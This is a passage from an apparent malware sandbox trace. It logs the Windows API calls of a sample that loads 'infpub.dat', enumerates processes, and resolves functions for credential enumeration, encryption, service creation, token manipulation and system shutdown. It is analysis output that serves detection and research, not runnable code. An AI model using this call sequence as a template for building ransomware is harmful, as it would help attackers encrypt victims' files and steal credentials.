th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.066] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0015.066] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0015.067] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0015.067] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x550, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x320, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0015.067] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x544, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0015.068] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0015.068] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x348, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0015.069] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0015.069] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="stands carbon.exe")) returned 1 [0015.070] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x41c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="condos_pine.exe")) returned 1 [0015.070] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="judgment gone rise whats.exe")) returned 1 [0015.070] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="browser feed experimental ea.exe")) returned 1 [0015.071] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x430, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="practices.exe")) returned 1 [0015.071] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reasons_hampton_considers.exe")) returned 1 [0015.072] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flat.exe")) returned 1 [0015.072] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="latest coach limit.exe")) returned 1 [0015.072] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="passion_ou.exe")) returned 1 [0015.073] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x628, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wishlist_boot_telecommunications.exe")) returned 1 [0015.073] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lines.exe")) returned 1 [0015.073] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="replacing-foul-vulnerable-switched.exe")) returned 1 [0015.074] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="mustang-entirely-banana.exe")) returned 1 [0015.074] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="coupledtalkedl.exe")) returned 1 [0015.075] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="highestbanglawn.exe")) returned 1 [0015.075] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x55c, pcPriClassBase=8, dwFlags=0x0, szExeFile="creator_thread.exe")) returned 1 [0015.075] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0015.076] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0015.076] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0015.077] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x928, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0015.077] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1 [0015.077] Process32NextW (in: hSnapshot=0x140, lppe=0x18f3b4 | out: lppe=0x18f3b4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x948, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 0 [0015.078] CloseHandle (hObject=0x140) returned 1 [0015.078] CryptAcquireContextW (in: phProv=0x18f5d4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18f5d4*=0x2b37e0) returned 1 [0015.110] CryptGenRandom (in: hProv=0x2b37e0, dwLen=0x4, pbBuffer=0x18f5ec | out: pbBuffer=0x18f5ec) returned 1 [0015.110] CryptReleaseContext (hProv=0x2b37e0, dwFlags=0x0) returned 1 [0015.110] GetModuleFileNameW (in: hModule=0x74950000, lpFilename=0x74967bc8, nSize=0x30c | out: lpFilename="C:\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat")) returned 0x15 [0015.110] CreateFileW (lpFileName="C:\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0015.110] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x64488 [0015.111] ReadFile (in: hFile=0x140, lpBuffer=0x2b57e0, nNumberOfBytesToRead=0x64488, lpNumberOfBytesRead=0x18f5e0, lpOverlapped=0x0 | out: lpBuffer=0x2b57e0*, lpNumberOfBytesRead=0x18f5e0*=0x64488, lpOverlapped=0x0) returned 1 [0015.113] CloseHandle (hObject=0x140) returned 1 [0015.113] VirtualAlloc (lpAddress=0x0, dwSize=0x68000, flAllocationType=0x1000, flProtect=0x4) returned 0xd40000 [0015.122] VirtualProtect (in: lpAddress=0xd40000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x18f5b8 | out: lpflOldProtect=0x18f5b8*=0x4) returned 1 [0015.122] VirtualProtect (in: lpAddress=0xd41000, dwSize=0xbfd3, flNewProtect=0x20, lpflOldProtect=0x18f5b8 | out: lpflOldProtect=0x18f5b8*=0x4) returned 1 [0015.122] VirtualProtect (in: lpAddress=0xd4d000, dwSize=0x5cfb, flNewProtect=0x2, lpflOldProtect=0x18f5b8 | out: lpflOldProtect=0x18f5b8*=0x4) returned 1 [0015.122] VirtualProtect (in: lpAddress=0xd53000, dwSize=0x5370, flNewProtect=0x4, lpflOldProtect=0x18f5b8 | out: lpflOldProtect=0x18f5b8*=0x4) returned 1 [0015.122] VirtualProtect (in: lpAddress=0xd59000, dwSize=0x4d600, flNewProtect=0x2, lpflOldProtect=0x18f5b8 | out: lpflOldProtect=0x18f5b8*=0x4) returned 1 [0015.123] VirtualProtect (in: lpAddress=0xda7000, dwSize=0xd90, flNewProtect=0x2, lpflOldProtect=0x18f5b8 | out: lpflOldProtect=0x18f5b8*=0x4) returned 1 [0015.123] FreeLibrary (hLibModule=0x74950000) returned 1 [0015.136] CreateFileW (lpFileName="C:\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc0 [0015.136] GetFileSize (in: hFile=0xc0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x64488 [0015.136] CloseHandle (hObject=0xc0) returned 1 [0015.136] CreateFileW (lpFileName="C:\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xc0 [0015.141] WriteFile (in: hFile=0xc0, lpBuffer=0x31b378*, nNumberOfBytesToWrite=0x64488, lpNumberOfBytesWritten=0x18f5b4, lpOverlapped=0x0 | out: lpBuffer=0x31b378*, lpNumberOfBytesWritten=0x18f5b4*=0x64488, lpOverlapped=0x0) returned 1 [0015.145] CloseHandle (hObject=0xc0) returned 1 [0015.148] DeleteFileW (lpFileName="C:\\Windows\\infpub.dat" (normalized: "c:\\windows\\infpub.dat")) returned 1 [0015.150] VirtualProtect (in: lpAddress=0xd4d000, dwSize=0x5cfb, flNewProtect=0x4, lpflOldProtect=0x18f590 | out: lpflOldProtect=0x18f590*=0x2) returned 1 [0015.150] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76600000 [0015.150] GetProcAddress (hModule=0x76600000, lpProcName="InterlockedExchange") returned 0x76611462 [0015.150] GetProcAddress (hModule=0x76600000, lpProcName="GetTempFileNameW") returned 0x7663d1b6 [0015.150] GetProcAddress (hModule=0x76600000, lpProcName="PeekNamedPipe") returned 0x76694821 [0015.150] GetProcAddress (hModule=0x76600000, lpProcName="CreateProcessW") returned 0x7661103d [0015.150] GetProcAddress (hModule=0x76600000, lpProcName="ConnectNamedPipe") returned 0x766940fb [0015.150] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleW") returned 0x766134b0 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="CreateNamedPipeW") returned 0x7669414b [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="TerminateThread") returned 0x76617a2f [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="DisconnectNamedPipe") returned 0x766941df [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="DeleteFileW") returned 0x766189b3 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="GlobalAlloc") returned 0x7661588e [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="GetComputerNameExW") returned 0x7663bb9e [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="GlobalFree") returned 0x76615558 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="ExitProcess") returned 0x76617a10 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleFileNameW") returned 0x76614950 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="DisableThreadLibraryCalls") returned 0x766148e5 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="ResumeThread") returned 0x766143ef [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="CreateMutexW") returned 0x7661424c [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="FindResourceW") returned 0x76615971 [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="FindNextFileW") returned 0x766154ee [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="GetComputerNameW") returned 0x7661dd0e [0015.151] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentThread") returned 0x766117ec [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="OpenProcess") returned 0x76611986 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="SizeofResource") returned 0x76615ac9 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="TerminateProcess") returned 0x7662d802 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="GetLocalTime") returned 0x76615aa6 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="Process32FirstW") returned 0x76638baf [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="LockResource") returned 0x76615959 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="Process32NextW") returned 0x7663896c [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="CreateToolhelp32Snapshot") returned 0x7663735f [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcessId") returned 0x766111f8 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="LoadLibraryA") returned 0x766149d7 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="VirtualProtect") returned 0x7661435f [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemTimeAsFileTime") returned 0x76613509 [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="WideCharToMultiByte") returned 0x7661170d [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="GetExitCodeProcess") returned 0x7662174d [0015.152] GetProcAddress (hModule=0x76600000, lpProcName="GetModuleHandleA") returned 0x76611245 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="InitializeCriticalSection") returned 0x76fa2c42 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="HeapReAlloc") returned 0x76fb1f6e [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="EnterCriticalSection") returned 0x76f922b0 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="SetLastError") returned 0x766111a9 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="LeaveCriticalSection") returned 0x76f92270 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="GetTickCount") returned 0x7661110c [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="MultiByteToWideChar") returned 0x7661192e [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemInfo") returned 0x766149ca [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="CreateEventW") returned 0x7661183e [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileMappingW") returned 0x76611909 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="FindClose") returned 0x76614442 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="GetFileSizeEx") returned 0x766159e2 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="GetEnvironmentVariableW") returned 0x76611b48 [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="FlushFileBuffers") returned 0x7661469b [0015.153] GetProcAddress (hModule=0x76600000, lpProcName="FlushViewOfFile") returned 0x7663b909 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="GetLogicalDrives") returned 0x76615371 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="SetEvent") returned 0x766116c5 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="WaitForSingleObject") returned 0x76611136 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="SetFilePointerEx") returned 0x7662c807 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="SetEndOfFile") returned 0x7662ce2e [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="GetDriveTypeW") returned 0x7661418b [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="UnmapViewOfFile") returned 0x76611826 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="MapViewOfFile") returned 0x766118f1 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="FindFirstFileW") returned 0x76614435 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="LocalFree") returned 0x76612d3c [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="LocalAlloc") returned 0x7661168c [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="GetTimeZoneInformation") returned 0x7661465a [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemDefaultLCID") returned 0x766132a9 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="HeapAlloc") returned 0x76f9e026 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="VirtualAlloc") returned 0x76611856 [0015.154] GetProcAddress (hModule=0x76600000, lpProcName="GetProcAddress") returned 0x76611222 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="ReadFile") returned 0x76613ed3 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="GetVersionExW") returned 0x76611ae5 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="LoadLibraryW") returned 0x7661492b [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="WriteFile") returned 0x76611282 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="VirtualFree") returned 0x7661186e [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="GetCurrentProcess") returned 0x76611809 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="FreeLibrary") returned 0x766134c8 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="GetFileSize") returned 0x7661196e [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="CloseHandle") returned 0x76611410 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="CreateFileW") returned 0x76613f5c [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="GetVersion") returned 0x76614467 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="GetLastError") returned 0x766111c0 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="ExpandEnvironmentStringsW") returned 0x76614173 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="lstrcatW") returned 0x7663828e [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="WaitForMultipleObjects") returned 0x76614220 [0015.155] GetProcAddress (hModule=0x76600000, lpProcName="CreateThread") returned 0x766134d5 [0015.156] GetProcAddress (hModule=0x76600000, lpProcName="Sleep") returned 0x766110ff [0015.156] GetProcAddress (hModule=0x76600000, lpProcName="GetSystemDirectoryW") returned 0x76615063 [0015.156] GetProcAddress (hModule=0x76600000, lpProcName="GetProcessHeap") returned 0x766114e9 [0015.156] GetProcAddress (hModule=0x76600000, lpProcName="HeapFree") returned 0x766114c9 [0015.156] GetProcAddress (hModule=0x76600000, lpProcName="LoadResource") returned 0x7661594c [0015.156] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74ca0000 [0015.156] GetProcAddress (hModule=0x74ca0000, lpProcName="ExitWindowsEx") returned 0x74d01497 [0015.156] GetProcAddress (hModule=0x74ca0000, lpProcName="GetSystemMetrics") returned 0x74cb7d2f [0015.156] GetProcAddress (hModule=0x74ca0000, lpProcName="CharUpperW") returned 0x74cbf350 [0015.156] GetProcAddress (hModule=0x74ca0000, lpProcName="wsprintfW") returned 0x74cde061 [0015.156] GetProcAddress (hModule=0x74ca0000, lpProcName="wsprintfA") returned 0x74ccae5f [0015.156] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74ea0000 [0015.156] GetProcAddress (hModule=0x74ea0000, lpProcName="RegFlushKey") returned 0x74ec773f [0015.156] GetProcAddress (hModule=0x74ea0000, lpProcName="CloseServiceHandle") returned 0x74eb369c [0015.156] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenSCManagerW") returned 0x74eaca64 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="RegQueryValueExW") returned 0x74eb46ad [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="RegOpenKeyW") returned 0x74eb2459 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="QueryServiceStatus") returned 0x74eb2a86 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="StartServiceW") returned 0x74ea7974 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateProcessAsUserW") returned 0x74eac592 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="DeleteService") returned 0x74ec715c [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="InitiateSystemShutdownExW") returned 0x74efdb3a [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="DuplicateTokenEx") returned 0x74eaca24 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="SetTokenInformation") returned 0x74ea9a92 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="DuplicateToken") returned 0x74eac7e6 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="GetTokenInformation") returned 0x74eb431c [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthorityCount") returned 0x74eb0e0c [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenThreadToken") returned 0x74eb432c [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="GetSidSubAuthority") returned 0x74eb0e24 [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="SetThreadToken") returned 0x74eac7ce [0015.157] GetProcAddress (hModule=0x74ea0000, lpProcName="CredEnumerateW") returned 0x74ee7481 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CredFree") returned 0x74eab2ec [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="SetSecurityDescriptorDacl") returned 0x74eb415e [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="InitializeSecurityDescriptor") returned 0x74eb4620 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDuplicateKey") returned 0x74ee31a8 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDuplicateHash") returned 0x74ee3198 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptEncrypt") returned 0x74ec779b [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptGenRandom") returned 0x74eadfc8 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptGetKeyParam") returned 0x74ec77cb [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptSetKeyParam") returned 0x74ec77b3 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDeriveKey") returned 0x74ee3188 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptHashData") returned 0x74eadf36 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyHash") returned 0x74eadf66 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptDestroyKey") returned 0x74eac51a [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptCreateHash") returned 0x74eadf4e [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptImportKey") returned 0x74eac532 [0015.158] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptReleaseContext") returned 0x74eae124 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptAcquireContextW") returned 0x74eadf14 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptGetHashParam") returned 0x74eadf7e [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="CryptSetHashParam") returned 0x74ee3248 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="AdjustTokenPrivileges") returned 0x74eb418e [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="CheckTokenMembership") returned 0x74eadf04 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="FreeSid") returned 0x74eb412e [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="AllocateAndInitializeSid") returned 0x74eb40e6 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="LookupPrivilegeValueW") returned 0x74eb41b3 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="OpenProcessToken") returned 0x74eb4304 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="RegSetValueExW") returned 0x74eb14d6 [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="RegCloseKey") returned 0x74eb469d [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="RegOpenKeyExW") returned 0x74eb468d [0015.159] GetProcAddress (hModule=0x74ea0000, lpProcName="CreateServiceW") returned 0x74ec712c [0015.159] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x74f40000 [0015.163] GetProcAddress (hModule=0x74f40000, lpProcName="CommandLineToArgvW") returned 0x74f59ee8 [0015.163] 